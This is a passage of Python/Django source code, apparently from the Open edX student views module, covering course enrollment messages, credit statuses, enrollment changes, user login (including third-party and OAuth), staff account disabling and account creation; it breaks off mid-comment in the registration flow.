    Constructs a new message template based on any recent course enrollments
    for the student.

    Args:
        course_enrollments (list[CourseEnrollment]): a list of course enrollments.
        course_modes (dict): Mapping of course ID's to course mode dictionaries.

    Returns:
        A string representing the HTML message output from the message template,
        or None if there are no recently enrolled courses.
    """
    recent_enrollments = _get_recently_enrolled_courses(course_enrollments)
    if not recent_enrollments:
        return None

    enroll_messages = []
    for enrollment in recent_enrollments:
        overview = enrollment.course_overview
        enroll_messages.append({
            "course_id": overview.id,
            "course_name": overview.display_name,
            "allow_donation": _allow_donation(course_modes, overview.id, enrollment),
        })

    platform_name = configuration_helpers.get_value('platform_name', settings.PLATFORM_NAME)
    return render_to_string(
        'enrollment/course_enrollment_message.html',
        {'course_enrollment_messages': enroll_messages, 'platform_name': platform_name}
    )
def _get_recently_enrolled_courses(course_enrollments):
    """
    Given a list of enrollments, filter out all but recent enrollments.

    Args:
        course_enrollments (list[CourseEnrollment]): A list of course enrollments.

    Returns:
        list[CourseEnrollment]: A list of recent course enrollments.
    """
    # The "recent" window is configured in seconds on the dashboard config.
    window_seconds = DashboardConfiguration.current().recent_enrollment_time_delta
    cutoff = datetime.datetime.now(UTC) - datetime.timedelta(seconds=window_seconds)
    # An enrollment with no created date compares False against the cutoff and
    # is therefore excluded from the list of recent enrollments.
    return [
        enrollment for enrollment in course_enrollments
        if enrollment.is_active and enrollment.created > cutoff
    ]
def _allow_donation(course_modes, course_id, enrollment):
    """Determines if the dashboard will request donations for the given course.

    Check if donations are configured for the platform, and if the current course is accepting donations.

    Args:
        course_modes (dict): Mapping of course ID's to course mode dictionaries.
        course_id (str): The unique identifier for the course.
        enrollment(CourseEnrollment): The enrollment object in which the user is enrolled

    Returns:
        True if the course is allowing donations.
    """
    if course_id not in course_modes:
        flat_unexpired_modes = {
            unicode(course_id): [mode for mode in modes]
            for course_id, modes in course_modes.iteritems()
        }
        flat_all_modes = {
            unicode(course_id): [mode.slug for mode in modes]
            for course_id, modes in CourseMode.all_modes_for_courses([course_id]).iteritems()
        }
        log.error(
            u'Can not find `%s` in course modes.`%s`. All modes: `%s`',
            course_id,
            flat_unexpired_modes,
            flat_all_modes
        )
        # BUGFIX: previously execution fell through to `course_modes[course_id]`
        # below, raising KeyError whenever donations were enabled. A course with
        # no known modes cannot accept donations, so answer False here.
        return False

    donations_enabled = DonationConfiguration.current().enabled
    # Donations are requested only for free (min_price == 0) enrollments.
    return (
        donations_enabled and
        enrollment.mode in course_modes[course_id] and
        course_modes[course_id][enrollment.mode].min_price == 0
    )
def _update_email_opt_in(request, org):
    """Helper function used to hit the profile API if email opt-in is enabled."""
    raw_value = request.POST.get('email_opt_in')
    # Only act when the form actually posted the field; absence means "no change".
    if raw_value is None:
        return
    preferences_api.update_email_opt_in(request.user, org, raw_value == 'true')
def _credit_statuses(user, course_enrollments):
    """
    Retrieve the status for credit courses.

    A credit course is a course for which a user can purchased
    college credit.  The current flow is:

    1. User becomes eligible for credit (submits verifications, passes the course, etc.)
    2. User purchases credit from a particular credit provider.
    3. User requests credit from the provider, usually creating an account on the provider's site.
    4. The credit provider notifies us whether the user's request for credit has been accepted or rejected.

    The dashboard is responsible for communicating the user's state in this flow.

    Arguments:
        user (User): The currently logged-in user.
        course_enrollments (list[CourseEnrollment]): List of enrollments for the
            user.

    Returns: dict

        The returned dictionary has keys that are `CourseKey`s and values that
        are dictionaries with:

            * eligible (bool): True if the user is eligible for credit in this course.
            * deadline (datetime): The deadline for purchasing and requesting credit for this course.
            * purchased (bool): Whether the user has purchased credit for this course.
            * provider_name (string): The display name of the credit provider.
            * provider_status_url (string): A URL the user can visit to check on their credit request status.
            * request_status (string): Either "pending", "approved", or "rejected"
            * error (bool): If true, an unexpected error occurred when retrieving the credit status,
                so the user should contact the support team.

    Example:
        >>> _credit_statuses(user, course_enrollments)
        {
            CourseKey.from_string("edX/DemoX/Demo_Course"): {
                "course_key": "edX/DemoX/Demo_Course",
                "eligible": True,
                "deadline": 2015-11-23 00:00:00 UTC,
                "purchased": True,
                "provider_name": "Hogwarts",
                "provider_status_url": "http://example.com/status",
                "request_status": "pending",
                "error": False
            }
        }
    """
    # Imported here (not at module level) — presumably to avoid an import
    # cycle with the credit app; TODO confirm before hoisting.
    from openedx.core.djangoapps.credit import api as credit_api

    # Feature flag off
    if not settings.FEATURES.get("ENABLE_CREDIT_ELIGIBILITY"):
        return {}

    request_status_by_course = {
        request["course_key"]: request["status"]
        for request in credit_api.get_credit_requests_for_user(user.username)
    }

    credit_enrollments = {
        enrollment.course_id: enrollment
        for enrollment in course_enrollments
        if enrollment.mode == "credit"
    }

    # When a user purchases credit in a course, the user's enrollment
    # mode is set to "credit" and an enrollment attribute is set
    # with the ID of the credit provider.  We retrieve *all* such attributes
    # here to minimize the number of database queries.
    purchased_credit_providers = {
        attribute.enrollment.course_id: attribute.value
        for attribute in CourseEnrollmentAttribute.objects.filter(
            namespace="credit",
            name="provider_id",
            enrollment__in=credit_enrollments.values()
        ).select_related("enrollment")
    }

    provider_info_by_id = {
        provider["id"]: provider
        for provider in credit_api.get_credit_providers()
    }

    statuses = {}
    for eligibility in credit_api.get_eligibilities_for_user(user.username):
        course_key = CourseKey.from_string(unicode(eligibility["course_key"]))
        providers_names = get_credit_provider_display_names(course_key)
        status = {
            "course_key": unicode(course_key),
            "eligible": True,
            "deadline": eligibility["deadline"],
            "purchased": course_key in credit_enrollments,
            "provider_name": make_providers_strings(providers_names),
            "provider_status_url": None,
            "provider_id": None,
            "request_status": request_status_by_course.get(course_key),
            "error": False,
        }

        # If the user has purchased credit, then include information about the credit
        # provider from which the user purchased credit.
        # We retrieve the provider's ID from the an "enrollment attribute" set on the user's
        # enrollment when the user's order for credit is fulfilled by the E-Commerce service.
        if status["purchased"]:
            provider_id = purchased_credit_providers.get(course_key)
            if provider_id is None:
                status["error"] = True
                log.error(
                    u"Could not find credit provider associated with credit enrollment "
                    u"for user %s in course %s. The user will not be able to see his or her "
                    u"credit request status on the student dashboard. This attribute should "
                    u"have been set when the user purchased credit in the course.",
                    user.id, course_key
                )
            else:
                provider_info = provider_info_by_id.get(provider_id, {})
                status["provider_name"] = provider_info.get("display_name")
                status["provider_status_url"] = provider_info.get("status_url")
                status["provider_id"] = provider_id

        statuses[course_key] = status

    return statuses
@transaction.non_atomic_requests
@require_POST
@outer_atomic(read_committed=True)
def change_enrollment(request, check_access=True):
    """
    Modify the enrollment status for the logged-in user.

    TODO: This is lms specific and does not belong in common code.

    The request parameter must be a POST request (other methods return 405)
    that specifies course_id and enrollment_action parameters. If course_id or
    enrollment_action is not specified, if course_id is not valid, if
    enrollment_action is something other than "enroll" or "unenroll", if
    enrollment_action is "enroll" and enrollment is closed for the course, or
    if enrollment_action is "unenroll" and the user is not enrolled in the
    course, a 400 error will be returned. If the user is not logged in, 403
    will be returned; it is important that only this case return 403 so the
    front end can redirect the user to a registration or login page when this
    happens. This function should only be called from an AJAX request, so
    the error messages in the responses should never actually be user-visible.

    Args:
        request (`Request`): The Django request object

    Keyword Args:
        check_access (boolean): If True, we check that an accessible course actually
            exists for the given course_key before we enroll the student.
            The default is set to False to avoid breaking legacy code or
            code with non-standard flows (ex. beta tester invitations), but
            for any standard enrollment flow you probably want this to be True.

    Returns:
        Response
    """
    # Get the user
    user = request.user

    # Ensure the user is authenticated
    if not user.is_authenticated():
        return HttpResponseForbidden()

    # Ensure we received a course_id
    action = request.POST.get("enrollment_action")
    if 'course_id' not in request.POST:
        return HttpResponseBadRequest(_("Course id not specified"))

    try:
        course_id = SlashSeparatedCourseKey.from_deprecated_string(request.POST.get("course_id"))
    except InvalidKeyError:
        log.warning(
            u"User %s tried to %s with invalid course id: %s",
            user.username,
            action,
            request.POST.get("course_id"),
        )
        return HttpResponseBadRequest(_("Invalid course id"))

    if action == "enroll":
        # Make sure the course exists
        # We don't do this check on unenroll, or a bad course id can't be unenrolled from
        if not modulestore().has_course(course_id):
            log.warning(
                u"User %s tried to enroll in non-existent course %s",
                user.username,
                course_id
            )
            return HttpResponseBadRequest(_("Course id is invalid"))

        # Record the user's email opt-in preference
        if settings.FEATURES.get('ENABLE_MKTG_EMAIL_OPT_IN'):
            _update_email_opt_in(request, course_id.org)

        available_modes = CourseMode.modes_for_course_dict(course_id)

        # Check whether the user is blocked from enrolling in this course
        # This can occur if the user's IP is on a global blacklist
        # or if the user is enrolling in a country in which the course
        # is not available.
        redirect_url = embargo_api.redirect_if_blocked(
            course_id, user=user, ip_address=get_ip(request),
            url=request.path
        )
        if redirect_url:
            return HttpResponse(redirect_url)

        # Check that auto enrollment is allowed for this course
        # (= the course is NOT behind a paywall)
        if CourseMode.can_auto_enroll(course_id):
            # Enroll the user using the default mode (audit)
            # We're assuming that users of the course enrollment table
            # will NOT try to look up the course enrollment model
            # by its slug.  If they do, it's possible (based on the state of the database)
            # for no such model to exist, even though we've set the enrollment type
            # to "audit".
            try:
                enroll_mode = CourseMode.auto_enroll_mode(course_id, available_modes)
                if enroll_mode:
                    CourseEnrollment.enroll(user, course_id, check_access=check_access, mode=enroll_mode)
            except Exception:  # pylint: disable=broad-except
                return HttpResponseBadRequest(_("Could not enroll"))

        # If we have more than one course mode or professional ed is enabled,
        # then send the user to the choose your track page.
        # (In the case of no-id-professional/professional ed, this will redirect to a page that
        # funnels users directly into the verification / payment flow)
        if CourseMode.has_verified_mode(available_modes) or CourseMode.has_professional_mode(available_modes):
            return HttpResponse(
                reverse("course_modes_choose", kwargs={'course_id': unicode(course_id)})
            )

        # Otherwise, there is only one mode available (the default)
        return HttpResponse()
    elif action == "unenroll":
        enrollment = CourseEnrollment.get_enrollment(user, course_id)
        if not enrollment:
            return HttpResponseBadRequest(_("You are not enrolled in this course"))

        # A certificate in certain states blocks self-service unenrollment.
        certificate_info = cert_info(user, enrollment.course_overview, enrollment.mode)
        if certificate_info.get('status') in DISABLE_UNENROLL_CERT_STATES:
            return HttpResponseBadRequest(_("Your certificate prevents you from unenrolling from this course"))

        CourseEnrollment.unenroll(user, course_id)
        return HttpResponse()
    else:
        return HttpResponseBadRequest(_("Enrollment action is invalid"))
# Need different levels of logging
@ensure_csrf_cookie
def login_user(request, error=""):  # pylint: disable=too-many-statements,unused-argument
    """AJAX request to log in the user.

    Handles both first-party (email/password) and third-party (social auth
    pipeline) login.  Returns JSON for most outcomes; plain-text 403 for an
    unlinked third-party account.
    """
    backend_name = None
    email = None
    password = None
    redirect_url = None
    response = None
    running_pipeline = None
    third_party_auth_requested = third_party_auth.is_enabled() and pipeline.running(request)
    third_party_auth_successful = False
    # Supplying an email or password explicitly overrides third-party auth.
    trumped_by_first_party_auth = bool(request.POST.get('email')) or bool(request.POST.get('password'))
    user = None
    platform_name = configuration_helpers.get_value("platform_name", settings.PLATFORM_NAME)

    if third_party_auth_requested and not trumped_by_first_party_auth:
        # The user has already authenticated via third-party auth and has not
        # asked to do first party auth by supplying a username or password. We
        # now want to put them through the same logging and cookie calculation
        # logic as with first-party auth.
        running_pipeline = pipeline.get(request)
        username = running_pipeline['kwargs'].get('username')
        backend_name = running_pipeline['backend']
        third_party_uid = running_pipeline['kwargs']['uid']
        requested_provider = provider.Registry.get_from_pipeline(running_pipeline)

        try:
            user = pipeline.get_authenticated_user(requested_provider, username, third_party_uid)
            third_party_auth_successful = True
        except User.DoesNotExist:
            AUDIT_LOG.warning(
                u"Login failed - user with username {username} has no social auth "
                "with backend_name {backend_name}".format(
                    username=username, backend_name=backend_name)
            )
            message = _(
                "You've successfully logged into your {provider_name} account, "
                "but this account isn't linked with an {platform_name} account yet."
            ).format(
                platform_name=platform_name,
                provider_name=requested_provider.name,
            )
            message += "<br/><br/>"
            message += _(
                "Use your {platform_name} username and password to log into {platform_name} below, "
                "and then link your {platform_name} account with {provider_name} from your dashboard."
            ).format(
                platform_name=platform_name,
                provider_name=requested_provider.name,
            )
            message += "<br/><br/>"
            message += _(
                "If you don't have an {platform_name} account yet, "
                "click <strong>Register</strong> at the top of the page."
            ).format(
                platform_name=platform_name
            )
            return HttpResponse(message, content_type="text/plain", status=403)
    else:
        if 'email' not in request.POST or 'password' not in request.POST:
            return JsonResponse({
                "success": False,
                # TODO: User error message
                "value": _('There was an error receiving your login information. Please email us.'),
            })  # TODO: this should be status code 400

        email = request.POST['email']
        password = request.POST['password']
        try:
            user = User.objects.get(email=email)
        except User.DoesNotExist:
            if settings.FEATURES['SQUELCH_PII_IN_LOGS']:
                AUDIT_LOG.warning(u"Login failed - Unknown user email")
            else:
                AUDIT_LOG.warning(u"Login failed - Unknown user email: {0}".format(email))

    # check if the user has a linked shibboleth account, if so, redirect the user to shib-login
    # This behavior is pretty much like what gmail does for shibboleth.  Try entering some @stanford.edu
    # address into the Gmail login.
    if settings.FEATURES.get('AUTH_USE_SHIB') and user:
        try:
            eamap = ExternalAuthMap.objects.get(user=user)
            if eamap.external_domain.startswith(openedx.core.djangoapps.external_auth.views.SHIBBOLETH_DOMAIN_PREFIX):
                return JsonResponse({
                    "success": False,
                    "redirect": reverse('shib-login'),
                })  # TODO: this should be status code 301  # pylint: disable=fixme
        except ExternalAuthMap.DoesNotExist:
            # This is actually the common case, logging in user without external linked login
            AUDIT_LOG.info(u"User %s w/o external auth attempting login", user)

    # see if account has been locked out due to excessive login failures
    user_found_by_email_lookup = user
    if user_found_by_email_lookup and LoginFailures.is_feature_enabled():
        if LoginFailures.is_user_locked_out(user_found_by_email_lookup):
            lockout_message = _('This account has been temporarily locked due '
                                'to excessive login failures. Try again later.')
            return JsonResponse({
                "success": False,
                "value": lockout_message,
            })  # TODO: this should be status code 429  # pylint: disable=fixme

    # see if the user must reset his/her password due to any policy settings
    if user_found_by_email_lookup and PasswordHistory.should_user_reset_password_now(user_found_by_email_lookup):
        return JsonResponse({
            "success": False,
            "value": _('Your password has expired due to password policy on this account. You must '
                       'reset your password before you can log in again. Please click the '
                       '"Forgot Password" link on this page to reset your password before logging in again.'),
        })  # TODO: this should be status code 403  # pylint: disable=fixme

    # if the user doesn't exist, we want to set the username to an invalid
    # username so that authentication is guaranteed to fail and we can take
    # advantage of the ratelimited backend
    username = user.username if user else ""

    if not third_party_auth_successful:
        try:
            user = authenticate(username=username, password=password, request=request)
        # this occurs when there are too many attempts from the same IP address
        except RateLimitException:
            return JsonResponse({
                "success": False,
                "value": _('Too many failed login attempts. Try again later.'),
            })  # TODO: this should be status code 429  # pylint: disable=fixme

    if user is None:
        # tick the failed login counters if the user exists in the database
        if user_found_by_email_lookup and LoginFailures.is_feature_enabled():
            LoginFailures.increment_lockout_counter(user_found_by_email_lookup)

        # if we didn't find this username earlier, the account for this email
        # doesn't exist, and doesn't have a corresponding password
        if username != "":
            if settings.FEATURES['SQUELCH_PII_IN_LOGS']:
                loggable_id = user_found_by_email_lookup.id if user_found_by_email_lookup else "<unknown>"
                AUDIT_LOG.warning(u"Login failed - password for user.id: {0} is invalid".format(loggable_id))
            else:
                AUDIT_LOG.warning(u"Login failed - password for {0} is invalid".format(email))
        return JsonResponse({
            "success": False,
            "value": _('Email or password is incorrect.'),
        })  # TODO: this should be status code 400  # pylint: disable=fixme

    # successful login, clear failed login attempts counters, if applicable
    if LoginFailures.is_feature_enabled():
        LoginFailures.clear_lockout_counter(user)

    # Track the user's sign in
    if hasattr(settings, 'LMS_SEGMENT_KEY') and settings.LMS_SEGMENT_KEY:
        tracking_context = tracker.get_tracker().resolve_context()
        analytics.identify(
            user.id,
            {
                'email': email,
                'username': username
            },
            {
                # Disable MailChimp because we don't want to update the user's email
                # and username in MailChimp on every page load. We only need to capture
                # this data on registration/activation.
                'MailChimp': False
            }
        )

        analytics.track(
            user.id,
            "edx.bi.user.account.authenticated",
            {
                'category': "conversion",
                'label': request.POST.get('course_id'),
                'provider': None
            },
            context={
                'ip': tracking_context.get('ip'),
                'Google Analytics': {
                    'clientId': tracking_context.get('client_id')
                }
            }
        )

    if user is not None and user.is_active:
        try:
            # We do not log here, because we have a handler registered
            # to perform logging on successful logins.
            login(request, user)
            if request.POST.get('remember') == 'true':
                # "Remember me": keep the session for one week (604800 s).
                request.session.set_expiry(604800)
                log.debug("Setting user session to never expire")
            else:
                request.session.set_expiry(0)
        except Exception as exc:  # pylint: disable=broad-except
            AUDIT_LOG.critical("Login failed - Could not create session. Is memcached running?")
            log.critical("Login failed - Could not create session. Is memcached running?")
            log.exception(exc)
            raise

        redirect_url = None  # The AJAX method calling should know the default destination upon success
        if third_party_auth_successful:
            redirect_url = pipeline.get_complete_url(backend_name)

        response = JsonResponse({
            "success": True,
            "redirect_url": redirect_url,
        })

        # Ensure that the external marketing site can
        # detect that the user is logged in.
        return set_logged_in_cookies(request, response, user)

    if settings.FEATURES['SQUELCH_PII_IN_LOGS']:
        AUDIT_LOG.warning(u"Login failed - Account not active for user.id: {0}, resending activation".format(user.id))
    else:
        AUDIT_LOG.warning(u"Login failed - Account not active for user {0}, resending activation".format(username))

    reactivation_email_for_user(user)
    not_activated_msg = _("Before you sign in, you need to activate your account. We have sent you an "
                          "email message with instructions for activating your account.")
    return JsonResponse({
        "success": False,
        "value": not_activated_msg,
    })  # TODO: this should be status code 400  # pylint: disable=fixme
@csrf_exempt
@require_POST
@social_utils.strategy("social:complete")
def login_oauth_token(request, backend):
    """
    Authenticate the client using an OAuth access token by using the token to
    retrieve information from a third party and matching that information to an
    existing user.
    """
    warnings.warn("Please use AccessTokenExchangeView instead.", DeprecationWarning)
    backend = request.backend

    # Only OAuth1/OAuth2 backends are supported by this endpoint.
    if not isinstance(backend, (social_oauth.BaseOAuth1, social_oauth.BaseOAuth2)):
        raise Http404

    if "access_token" not in request.POST:
        return JsonResponse({"error": "invalid_request"}, status=400)

    # Tell third party auth pipeline that this is an API call
    request.session[pipeline.AUTH_ENTRY_KEY] = pipeline.AUTH_ENTRY_LOGIN_API
    authenticated_user = None
    try:
        authenticated_user = backend.do_auth(request.POST["access_token"])
    except (HTTPError, AuthException):
        pass

    # do_auth can return a non-User object if it fails
    if authenticated_user and isinstance(authenticated_user, User):
        login(request, authenticated_user)
        return JsonResponse(status=204)

    # Ensure user does not re-enter the pipeline
    request.social_strategy.clean_partial_pipeline()
    return JsonResponse({"error": "invalid_token"}, status=401)
@require_GET
@login_required
@ensure_csrf_cookie
def manage_user_standing(request):
    """
    Renders the view used to manage user standing. Also displays a table
    of user accounts that have been disabled and who disabled them.
    """
    # Staff-only page.
    if not request.user.is_staff:
        raise Http404

    disabled_standings = UserStanding.objects.filter(
        account_status=UserStanding.ACCOUNT_DISABLED
    )
    # One table row per disabled account: who it is and who changed it.
    rows = [
        [standing.user.username, standing.user.standing.changed_by]
        for standing in disabled_standings
    ]
    context = {'headers': ['username', 'account_changed_by'], 'rows': rows}

    return render_to_response("manage_user_standing.html", context)
@require_POST
@login_required
@ensure_csrf_cookie
def disable_account_ajax(request):
    """
    Ajax call to change user standing. Endpoint of the form
    in manage_user_standing.html
    """
    # Staff-only endpoint.
    if not request.user.is_staff:
        raise Http404

    context = {}

    username = request.POST.get('username')
    if username is None or username.strip() == '':
        context['message'] = _('Please enter a username')
        return JsonResponse(context, status=400)

    account_action = request.POST.get('account_action')
    if account_action is None:
        context['message'] = _('Please choose an option')
        return JsonResponse(context, status=400)

    username = username.strip()
    try:
        user = User.objects.get(username=username)
    except User.DoesNotExist:
        context['message'] = _("User with username {} does not exist").format(username)
        return JsonResponse(context, status=400)

    # Named _created (not `_`) so the gettext alias is not clobbered.
    standing, _created = UserStanding.objects.get_or_create(
        user=user, defaults={'changed_by': request.user},
    )

    if account_action == 'disable':
        standing.account_status = UserStanding.ACCOUNT_DISABLED
        context['message'] = _("Successfully disabled {}'s account").format(username)
        log.info(u"%s disabled %s's account", request.user, username)
    elif account_action == 'reenable':
        standing.account_status = UserStanding.ACCOUNT_ENABLED
        context['message'] = _("Successfully reenabled {}'s account").format(username)
        log.info(u"%s reenabled %s's account", request.user, username)
    else:
        context['message'] = _("Unexpected account status")
        return JsonResponse(context, status=400)

    standing.changed_by = request.user
    standing.standing_last_changed_at = datetime.datetime.now(UTC)
    standing.save()

    return JsonResponse(context)
@login_required
@ensure_csrf_cookie
def change_setting(request):
    """JSON call to change a profile setting: Right now, location"""
    # TODO (vshnayder): location is no longer used
    profile = UserProfile.objects.get(user=request.user)  # request.user.profile_cache
    if 'location' in request.POST:
        profile.location = request.POST['location']
    # Save unconditionally, mirroring the original behaviour of this endpoint.
    profile.save()
    return JsonResponse({
        "success": True,
        "location": profile.location,
    })
class AccountValidationError(Exception):
    """
    Raised when account creation fails validation for one specific field.

    Carries the offending field's name (``field``) alongside the standard
    exception message so callers can report which input was rejected.
    """
    def __init__(self, message, field):
        super(AccountValidationError, self).__init__(message)
        self.field = field
@receiver(post_save, sender=User)
def user_signup_handler(sender, **kwargs):  # pylint: disable=unused-argument
    """
    post_save receiver that records the signup source (configured SITE_NAME)
    for a newly created User. No-op on updates or when SITE_NAME is unset.
    """
    if not kwargs.get('created'):
        return
    site = configuration_helpers.get_value('SITE_NAME')
    if site:
        UserSignupSource(user=kwargs['instance'], site=site).save()
        log.info(u'user {} originated from a white labeled "Microsite"'.format(kwargs['instance'].id))
def _do_create_account(form, custom_form=None):
    """
    Given cleaned post variables, create the User and UserProfile objects, as well as the
    registration for this user.

    Arguments:
        form (AccountCreationForm): validated form carrying username/email/password
            and the profile fields in ``cleaned_data``.
        custom_form: optional registration-extension model form; its model is
            saved with a reference to the new user inside the same transaction.

    Returns a tuple (User, UserProfile, Registration).

    Raises:
        ValidationError: if either form has errors.
        AccountValidationError: if the username or e-mail is already taken.

    Note: this function is also used for creating test users.
    """
    # Collect errors from both forms before touching the database.
    errors = {}
    errors.update(form.errors)
    if custom_form:
        errors.update(custom_form.errors)
    if errors:
        raise ValidationError(errors)
    # New accounts start inactive until the activation link is clicked.
    user = User(
        username=form.cleaned_data["username"],
        email=form.cleaned_data["email"],
        is_active=False
    )
    user.set_password(form.cleaned_data["password"])
    registration = Registration()
    # TODO: Rearrange so that if part of the process fails, the whole process fails.
    # Right now, we can have e.g. no registration e-mail sent out and a zombie account
    try:
        # Save the user and the custom-form model atomically so a failure in
        # either leaves no partial rows behind.
        with transaction.atomic():
            user.save()
            if custom_form:
                custom_model = custom_form.save(commit=False)
                custom_model.user = user
                custom_model.save()
    except IntegrityError:
        # Figure out the cause of the integrity error: a duplicate username
        # and a duplicate e-mail produce distinct, field-specific errors.
        if len(User.objects.filter(username=user.username)) > 0:
            raise AccountValidationError(
                _("An account with the Public Username '{username}' already exists.").format(username=user.username),
                field="username"
            )
        elif len(User.objects.filter(email=user.email)) > 0:
            raise AccountValidationError(
                _("An account with the Email '{email}' already exists.").format(email=user.email),
                field="email"
            )
        else:
            raise
    # add this account creation to password history
    # NOTE, this will be a NOP unless the feature has been turned on in configuration
    password_history_entry = PasswordHistory()
    password_history_entry.create(user)
    registration.register(user)
    profile_fields = [
        "name", "level_of_education", "gender", "mailing_address", "city", "country", "goals",
        "year_of_birth"
    ]
    profile = UserProfile(
        user=user,
        **{key: form.cleaned_data.get(key) for key in profile_fields}
    )
    # Extra (deployment-configured) profile fields are serialized into ``meta``.
    extended_profile = form.cleaned_extended_profile
    if extended_profile:
        profile.meta = json.dumps(extended_profile)
    try:
        profile.save()
    except Exception:  # pylint: disable=broad-except
        log.exception("UserProfile creation failed for user {id}.".format(id=user.id))
        raise
    return (user, profile, registration)
def create_account_with_params(request, params):
    """
    Given a request and a dict of parameters (which may or may not have come
    from the request), create an account for the requesting user, including
    creating a comments service user object and sending an activation email.
    This also takes external/third-party auth into account, updates that as
    necessary, and authenticates the user for the request's session.

    Returns the newly created (and logged-in) User object.

    Raises AccountValidationError if an account with the username or email
    specified by params already exists, or ValidationError if any of the given
    parameters is invalid for any other reason.

    Issues with this code:
    * It is not transactional. If there is a failure part-way, an incomplete
      account will be created and left in the database.
    * Third-party auth passwords are not verified. There is a comment that
      they are unused, but it would be helpful to have a sanity check that
      they are sane.
    * It is over 300 lines long (!) and includes disparate functionality, from
      registration e-mails to all sorts of other things. It should be broken
      up into semantically meaningful functions.
    * The user-facing text is rather unfriendly (e.g. "Username must be a
      minimum of two characters long" rather than "Please use a username of
      at least two characters").
    """
    # Copy params so we can modify it; we can't just do dict(params) because if
    # params is request.POST, that results in a dict containing lists of values
    params = dict(params.items())
    # allow to define custom set of required/optional/hidden fields via configuration
    extra_fields = configuration_helpers.get_value(
        'REGISTRATION_EXTRA_FIELDS',
        getattr(settings, 'REGISTRATION_EXTRA_FIELDS', {})
    )
    # Boolean of whether a 3rd party auth provider and credentials were provided in
    # the API so the newly created account can link with the 3rd party account.
    #
    # Note: this is orthogonal to the 3rd party authentication pipeline that occurs
    # when the account is created via the browser and redirect URLs.
    should_link_with_social_auth = third_party_auth.is_enabled() and 'provider' in params
    if should_link_with_social_auth or (third_party_auth.is_enabled() and pipeline.running(request)):
        params["password"] = pipeline.make_random_password()
    # if doing signup for an external authorization, then get email, password, name from the eamap
    # don't use the ones from the form, since the user could have hacked those
    # unless originally we didn't get a valid email or name from the external auth
    # TODO: We do not check whether these values meet all necessary criteria, such as email length
    do_external_auth = 'ExternalAuthMap' in request.session
    if do_external_auth:
        eamap = request.session['ExternalAuthMap']
        try:
            validate_email(eamap.external_email)
            params["email"] = eamap.external_email
        except ValidationError:
            pass
        if eamap.external_name.strip() != '':
            params["name"] = eamap.external_name
        params["password"] = eamap.internal_password
        log.debug(u'In create_account with external_auth: user = %s, email=%s', params["name"], params["email"])
    extended_profile_fields = configuration_helpers.get_value('extended_profile_fields', [])
    enforce_password_policy = (
        settings.FEATURES.get("ENFORCE_PASSWORD_POLICY", False) and
        not do_external_auth
    )
    # Can't have terms of service for certain SHIB users, like at Stanford
    # NOTE: short-circuit order matters below -- ``eamap`` only exists when
    # do_external_auth is True, and ``not do_external_auth`` is tested first.
    registration_fields = getattr(settings, 'REGISTRATION_EXTRA_FIELDS', {})
    tos_required = (
        registration_fields.get('terms_of_service') != 'hidden' or
        registration_fields.get('honor_code') != 'hidden'
    ) and (
        not settings.FEATURES.get("AUTH_USE_SHIB") or
        not settings.FEATURES.get("SHIB_DISABLE_TOS") or
        not do_external_auth or
        not eamap.external_domain.startswith(openedx.core.djangoapps.external_auth.views.SHIBBOLETH_DOMAIN_PREFIX)
    )
    form = AccountCreationForm(
        data=params,
        extra_fields=extra_fields,
        extended_profile_fields=extended_profile_fields,
        enforce_username_neq_password=True,
        enforce_password_policy=enforce_password_policy,
        tos_required=tos_required,
    )
    custom_form = get_registration_extension_form(data=params)
    # Perform operations within a transaction that are critical to account creation
    with transaction.atomic():
        # first, create the account
        (user, profile, registration) = _do_create_account(form, custom_form)
        # next, link the account with social auth, if provided via the API.
        # (If the user is using the normal register page, the social auth pipeline does the linking, not this code)
        if should_link_with_social_auth:
            backend_name = params['provider']
            request.social_strategy = social_utils.load_strategy(request)
            redirect_uri = reverse('social:complete', args=(backend_name, ))
            request.backend = social_utils.load_backend(request.social_strategy, backend_name, redirect_uri)
            social_access_token = params.get('access_token')
            if not social_access_token:
                raise ValidationError({
                    'access_token': [
                        _("An access_token is required when passing value ({}) for provider.").format(
                            params['provider']
                        )
                    ]
                })
            request.session[pipeline.AUTH_ENTRY_KEY] = pipeline.AUTH_ENTRY_REGISTER_API
            pipeline_user = None
            error_message = ""
            try:
                pipeline_user = request.backend.do_auth(social_access_token, user=user)
            except AuthAlreadyAssociated:
                error_message = _("The provided access_token is already associated with another user.")
            except (HTTPError, AuthException):
                error_message = _("The provided access_token is not valid.")
            if not pipeline_user or not isinstance(pipeline_user, User):
                # Ensure user does not re-enter the pipeline
                request.social_strategy.clean_partial_pipeline()
                # Raising inside the atomic block rolls back account creation.
                raise ValidationError({'access_token': [error_message]})
    # Perform operations that are non-critical parts of account creation
    preferences_api.set_user_preference(user, LANGUAGE_KEY, get_language())
    if settings.FEATURES.get('ENABLE_DISCUSSION_EMAIL_DIGEST'):
        try:
            enable_notifications(user)
        except Exception:  # pylint: disable=broad-except
            log.exception("Enable discussion notifications failed for user {id}.".format(id=user.id))
    dog_stats_api.increment("common.student.account_created")
    # If the user is registering via 3rd party auth, track which provider they use
    third_party_provider = None
    running_pipeline = None
    if third_party_auth.is_enabled() and pipeline.running(request):
        running_pipeline = pipeline.get(request)
        third_party_provider = provider.Registry.get_from_pipeline(running_pipeline)
    # Track the user's registration
    if hasattr(settings, 'LMS_SEGMENT_KEY') and settings.LMS_SEGMENT_KEY:
        tracking_context = tracker.get_tracker().resolve_context()
        identity_args = [
            user.id,  # pylint: disable=no-member
            {
                'email': user.email,
                'username': user.username,
                'name': profile.name,
                # Mailchimp requires the age & yearOfBirth to be integers, we send a sane integer default if falsey.
                'age': profile.age or -1,
                'yearOfBirth': profile.year_of_birth or datetime.datetime.now(UTC).year,
                'education': profile.level_of_education_display,
                'address': profile.mailing_address,
                'gender': profile.gender_display,
                'country': unicode(profile.country),
            }
        ]
        if hasattr(settings, 'MAILCHIMP_NEW_USER_LIST_ID'):
            identity_args.append({
                "MailChimp": {
                    "listId": settings.MAILCHIMP_NEW_USER_LIST_ID
                }
            })
        analytics.identify(*identity_args)
        analytics.track(
            user.id,
            "edx.bi.user.account.registered",
            {
                'category': 'conversion',
                'label': params.get('course_id'),
                'provider': third_party_provider.name if third_party_provider else None
            },
            context={
                'ip': tracking_context.get('ip'),
                'Google Analytics': {
                    'clientId': tracking_context.get('client_id')
                }
            }
        )
    # Announce registration
    REGISTER_USER.send(sender=None, user=user, profile=profile)
    create_comments_service_user(user)
    # Don't send email if we are:
    #
    # 1. Doing load testing.
    # 2. Random user generation for other forms of testing.
    # 3. External auth bypassing activation.
    # 4. Have the platform configured to not require e-mail activation.
    # 5. Registering a new user using a trusted third party provider (with skip_email_verification=True)
    #
